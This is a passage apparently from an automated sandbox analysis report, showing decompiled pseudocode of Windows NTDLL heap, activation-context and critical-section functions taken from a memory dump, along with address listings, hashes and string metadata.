								_t30 = E0347A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L03454620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                          0x03441b8f
                                                          0x03441b9a
                                                          0x03441b9c
                                                          0x03441b9e
                                                          0x03441ba3
                                                          0x03497010
                                                          0x03497010
                                                          0x00000000
                                                          0x03441ba9
                                                          0x03441ba9
                                                          0x03441bae
                                                          0x00000000
                                                          0x03441bc5
                                                          0x03441bca
                                                          0x03441bcf
                                                          0x03441bd0
                                                          0x03441bd1
                                                          0x03441bd2
                                                          0x03441bd6
                                                          0x03441bdc
                                                          0x03441be0
                                                          0x03496ffc
                                                          0x03497000
                                                          0x00000000
                                                          0x03497006
                                                          0x03497009
                                                          0x03497009
                                                          0x03441be6
                                                          0x03441bec
                                                          0x03441c0b
                                                          0x03441c0b
                                                          0x03441c0c
                                                          0x03441c11
                                                          0x03441c12
                                                          0x03441c15
                                                          0x03441c1b
                                                          0x03441c1f
                                                          0x03441c31
                                                          0x03441c33
                                                          0x03497026
                                                          0x03497026
                                                          0x03441c21
                                                          0x03441c24
                                                          0x03441c24
                                                          0x03441bee
                                                          0x03441bee
                                                          0x03441bf2
                                                          0x03441c3a
                                                          0x03441bf4
                                                          0x03441bf4
                                                          0x03441c05
                                                          0x03441c05
                                                          0x03441c09
                                                          0x03441c3e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03441c09
                                                          0x03441bec
                                                          0x03441be0
                                                          0x03441bae
                                                          0x03441c2e

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: WindowsExcludedProcs
                                                          • API String ID: 0-3583428290
                                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                          • Instruction ID: 23a431409959ba1b4535997443b8881176fd65849667444121c9f97f191964dc
                                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                          • Instruction Fuzzy Hash: BA21D376901228ABEB21DE558C40F9BFBADAB40650F0A8477FD148F300DA30D85187A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0345F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0345F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                          0x0345f71d
                                                          0x0345f722
                                                          0x0345f726
                                                          0x034a4770
                                                          0x0345f765
                                                          0x0345f769
                                                          0x0345f769
                                                          0x0345f732
                                                          0x034a477a
                                                          0x00000000
                                                          0x034a477a
                                                          0x0345f738
                                                          0x0345f73a
                                                          0x0345f73c
                                                          0x0345f73f
                                                          0x0345f746
                                                          0x0345f778
                                                          0x0345f7a9
                                                          0x0345f7a9
                                                          0x0345f754
                                                          0x0345f75a
                                                          0x0345f75d
                                                          0x0345f75f
                                                          0x0345f761
                                                          0x0345f76f
                                                          0x0345f771
                                                          0x0345f771
                                                          0x0345f76f
                                                          0x0345f763
                                                          0x00000000
                                                          0x0345f763
                                                          0x0345f77d
                                                          0x0345f7a3
                                                          0x0345f7a5
                                                          0x00000000
                                                          0x0345f7a5
                                                          0x0345f77f
                                                          0x0345f782
                                                          0x0345f784
                                                          0x0345f786
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0345f788
                                                          0x0345f748
                                                          0x0345f74d
                                                          0x0345f78d
                                                          0x0345f793
                                                          0x0345f7b7
                                                          0x0345f7bc
                                                          0x00000000
                                                          0x0345f7bc
                                                          0x0345f798
                                                          0x00000000
                                                          0x00000000
                                                          0x0345f79d
                                                          0x0345f7b0
                                                          0x00000000
                                                          0x0345f7b0
                                                          0x0345f79f
                                                          0x00000000
                                                          0x0345f74f
                                                          0x0345f74f
                                                          0x00000000
                                                          0x0345f74f

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Actx
                                                          • API String ID: 0-89312691
                                                          • Opcode ID: 8b362e692367d0c8335e3360a9af58e6dda9018ec956e7fcbf356fd4002cf712
                                                          • Instruction ID: 1fcf8c39e921293a913fd4b04d387e2b6bbe0818cb16621e57c1f664bb28f58d
                                                          • Opcode Fuzzy Hash: 8b362e692367d0c8335e3360a9af58e6dda9018ec956e7fcbf356fd4002cf712
                                                          • Instruction Fuzzy Hash: 86118139B44602CBE724DE1D8490637B29AEB95624F28452BFC72CF393D770D84AC34A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034E8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 71%
                                                          			E034E8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x3510d50);
				E0348D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E034C5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0348DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0348DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0348D130(_t34, _t39, _t40);
			}





                                                          0x034e8df1
                                                          0x034e8df1
                                                          0x034e8df1
                                                          0x034e8df1
                                                          0x034e8df1
                                                          0x034e8df1
                                                          0x034e8df3
                                                          0x034e8df8
                                                          0x034e8dfd
                                                          0x034e8e00
                                                          0x034e8e0e
                                                          0x034e8e2a
                                                          0x034e8e36
                                                          0x034e8e38
                                                          0x034e8e3c
                                                          0x034e8e46
                                                          0x034e8e46
                                                          0x034e8e36
                                                          0x034e8e50
                                                          0x034e8e56
                                                          0x034e8e59
                                                          0x034e8e5c
                                                          0x034e8e60
                                                          0x034e8e67
                                                          0x034e8e6d
                                                          0x034e8e73
                                                          0x034e8e74
                                                          0x034e8eb1
                                                          0x034e8ebd

                                                          Strings
                                                          • Critical error detected %lx, xrefs: 034E8E21
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Critical error detected %lx
                                                          • API String ID: 0-802127002
                                                          • Opcode ID: 00ba6e64d5cbd0f259dfa9c60318c5ac2167c44ab66ff35e39be7aeb7b6be20f
                                                          • Instruction ID: 4dcd1beca021ce80c05f07be4883a997f1709db5594ec3ee09c45a9df7e299eb
                                                          • Opcode Fuzzy Hash: 00ba6e64d5cbd0f259dfa9c60318c5ac2167c44ab66ff35e39be7aeb7b6be20f
                                                          • Instruction Fuzzy Hash: 5A117575D11348DEDF29DFA98905BADBBB0BB05715F24425EE428AF382C3340602CF19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034CFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 034CFF60
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                          • API String ID: 0-1911121157
                                                          • Opcode ID: 862b264794db07d04dbc52f769d14d26fdc69448680abd046758e3386c6fc9f8
                                                          • Instruction ID: 842d510ed0942bd30066d6a66cb42a378b71557a0315087f304a848c111e44be
                                                          • Opcode Fuzzy Hash: 862b264794db07d04dbc52f769d14d26fdc69448680abd046758e3386c6fc9f8
                                                          • Instruction Fuzzy Hash: BE110479920284EFDB61EF50C948F9DBBB2FF0A714F18845AE1046F2A1C73D9984DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03505BA5, Relevance: .6, Instructions: 592COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E03505BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x3511178);
				E0348D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03504C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0347D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03505542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x35260e8;
								if( *0x35260e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x35260e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03479710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03476DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0347F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0347F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0347F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0347FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0347FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0347F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0347F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
